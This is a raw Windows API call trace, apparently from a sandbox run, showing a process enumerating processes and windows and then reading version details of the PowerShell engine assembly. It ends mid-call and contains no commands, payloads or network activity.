[0130.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bcb088, Length=0x20000, ResultLength=0xcdc60 | out: SystemInformation=0x12bcb088, ResultLength=0xcdc60*=0xd718) returned 0x0 [0130.865] EnumWindows (lpEnumFunc=0x28d66ac, lParam=0x0) returned 1 [0130.866] GetWindowThreadProcessId (in: hWnd=0x2013e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.866] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x760 [0130.866] GetWindowThreadProcessId (in: hWnd=0x1009c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x1009a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x100b2, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x200a6, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.866] GetWindowThreadProcessId (in: hWnd=0x100a2, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x1009e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.867] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x500bc, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x100b4, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.867] GetWindowThreadProcessId (in: hWnd=0x100c4, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x201e6, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0xa84 [0130.868] GetWindowThreadProcessId (in: hWnd=0x20222, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x3020e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9cc [0130.868] GetWindowThreadProcessId (in: hWnd=0x201b0, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x118 [0130.868] GetWindowThreadProcessId (in: hWnd=0x3020c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x301ac, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x8a0 [0130.868] GetWindowThreadProcessId (in: hWnd=0x5019c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x678 [0130.868] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x558 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6f8 [0130.869] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x70c [0130.869] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x600 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x644 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x544 [0130.869] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x32c [0130.869] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x4bc [0130.869] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x504 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x448 [0130.869] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x484 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x758 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x1c4 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x7cc [0130.869] GetWindowThreadProcessId (in: hWnd=0x2015c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x7d4 [0130.869] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6e8 [0130.869] GetWindowThreadProcessId (in: hWnd=0x30116, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6a0 [0130.870] GetWindowThreadProcessId (in: hWnd=0x4012c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x678 [0130.870] GetWindowThreadProcessId (in: hWnd=0x30126, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x678 [0130.870] GetWindowThreadProcessId (in: hWnd=0x30152, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x730 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x788 [0130.870] GetWindowThreadProcessId (in: hWnd=0x60074, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x788 [0130.870] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.870] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x730 [0130.870] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x730 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x784 [0130.870] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.870] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x778 [0130.870] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.870] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100e4, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x200d8, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100c0, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x500b6, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100ac, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x740 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100aa, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x100a0, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6d8 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x708 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x664 [0130.871] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.871] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.872] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.872] GetWindowThreadProcessId (in: hWnd=0x30040, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x62c [0130.872] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x674 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6f0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0xbe4 [0130.872] GetWindowThreadProcessId (in: hWnd=0x2007a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x760 [0130.872] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6c0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x201a4, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x9b0 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x118 [0130.872] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x558 [0130.872] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6f8 [0130.872] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x70c [0130.873] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x600 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x644 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x544 [0130.873] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x32c [0130.873] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x4bc [0130.873] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x504 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x448 [0130.873] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x484 [0130.873] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x758 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x1c4 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x7cc [0130.873] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x7d4 [0130.873] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6e8 [0130.873] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6a0 [0130.873] GetWindowThreadProcessId (in: hWnd=0x2012a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x678 [0130.873] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x788 [0130.874] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x790 [0130.874] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x730 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6d8 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x708 [0130.874] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x664 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x684 [0130.874] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x62c [0130.874] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0x6f0 [0130.874] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcd9c0 | out: lpdwProcessId=0xcd9c0) returned 0xbf4 [0130.882] WerSetFlags () returned 0x0 [0130.906] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0130.906] CoTaskMemFree (pv=0x0) [0130.907] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdd20 | out: pulNumLanguages=0xcdd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdd20) returned 1 [0130.907] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdd28, pwszLanguagesBuffer=0x2be8988, pcchLanguagesBuffer=0xcdd20 | out: pulNumLanguages=0xcdd28, pwszLanguagesBuffer=0x2be8988, pcchLanguagesBuffer=0xcdd20) returned 1 [0130.962] CoTaskMemAlloc (cb=0x24) returned 0x1a29c0 [0130.962] GetUserDefaultLocaleName (in: lpLocaleName=0x1a29c0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0130.962] CoTaskMemFree (pv=0x1a29c0) [0131.006] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.006] CoTaskMemFree (pv=0x10c990) [0131.015] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.015] CoTaskMemFree (pv=0x10c990) [0131.036] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0131.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.036] CoTaskMemFree (pv=0x10c990) [0131.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0131.078] SetErrorMode (uMode=0x1) returned 0x1 [0131.078] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd9a0 | out: lpFileInformation=0xcd9a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0131.078] SetErrorMode (uMode=0x1) returned 0x1 [0131.079] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdc10 | out: lpdwHandle=0xcdc10) returned 0x94c [0131.079] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bec218 | out: lpData=0x2bec218) returned 1 [0131.080] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdb88, puLen=0xcdb80 | out: lplpBuffer=0xcdb88*=0x2bec2b4, puLen=0xcdb80) returned 1 [0131.080] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec390, puLen=0xcdaf0) returned 1 [0131.080] lstrlenW (lpString="Microsoft Corporation") returned 21 [0131.080] CoTaskMemAlloc (cb=0x2e) returned 0x1b23f0 [0131.080] lstrcpyW (in: lpString1=0x1b23f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0131.080] CoTaskMemFree (pv=0x1b23f0) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec3e4, puLen=0xcdaf0) returned 1 [0131.081] lstrlenW (lpString="System.Management.Automation") returned 28 [0131.081] CoTaskMemAlloc (cb=0x3c) returned 0x1655d0 [0131.081] lstrcpyW (in: lpString1=0x1655d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0131.081] CoTaskMemFree (pv=0x1655d0) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec440, puLen=0xcdaf0) returned 1 [0131.081] lstrlenW (lpString="6.1.7601.17514") returned 14 [0131.081] CoTaskMemAlloc (cb=0x20) returned 0x1a9ca0 [0131.081] lstrcpyW (in: lpString1=0x1a9ca0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0131.081] CoTaskMemFree (pv=0x1a9ca0) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec480, puLen=0xcdaf0) returned 1 [0131.081] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0131.081] CoTaskMemAlloc (cb=0x44) returned 0x1655d0 [0131.081] lstrcpyW (in: lpString1=0x1655d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0131.081] CoTaskMemFree (pv=0x1655d0) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec4e8, puLen=0xcdaf0) returned 1 [0131.081] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0131.081] CoTaskMemAlloc (cb=0x76) returned 0x147840 [0131.081] lstrcpyW (in: lpString1=0x147840, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0131.081] CoTaskMemFree (pv=0x147840) [0131.081] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec584, puLen=0xcdaf0) returned 1 [0131.082] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0131.082] CoTaskMemAlloc (cb=0x44) returned 0x1655d0 [0131.082] lstrcpyW (in: lpString1=0x1655d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0131.082] CoTaskMemFree (pv=0x1655d0) [0131.082] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec5e8, puLen=0xcdaf0) returned 1 [0131.082] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0131.082] CoTaskMemAlloc (cb=0x58) returned 0x10bab0 [0131.082] lstrcpyW (in: lpString1=0x10bab0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0131.082] CoTaskMemFree (pv=0x10bab0) [0131.082] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec664, puLen=0xcdaf0) returned 1 [0131.082] lstrlenW (lpString="6.1.7601.17514") returned 14 [0131.082] CoTaskMemAlloc (cb=0x20) returned 0x1a9ca0 [0131.082] lstrcpyW (in: lpString1=0x1a9ca0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0131.082] CoTaskMemFree (pv=0x1a9ca0) [0131.082] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2bec30c, puLen=0xcdaf0) returned 1 [0131.082] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0131.082] CoTaskMemAlloc (cb=0x66) returned 0x19b800 [0131.082] lstrcpyW (in: lpString1=0x19b800, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0131.083] CoTaskMemFree (pv=0x19b800) [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x0, puLen=0xcdaf0) returned 0 [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x0, puLen=0xcdaf0) returned 0 [0131.083] VerQueryValueW (in: pBlock=0x2bec218, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x0, 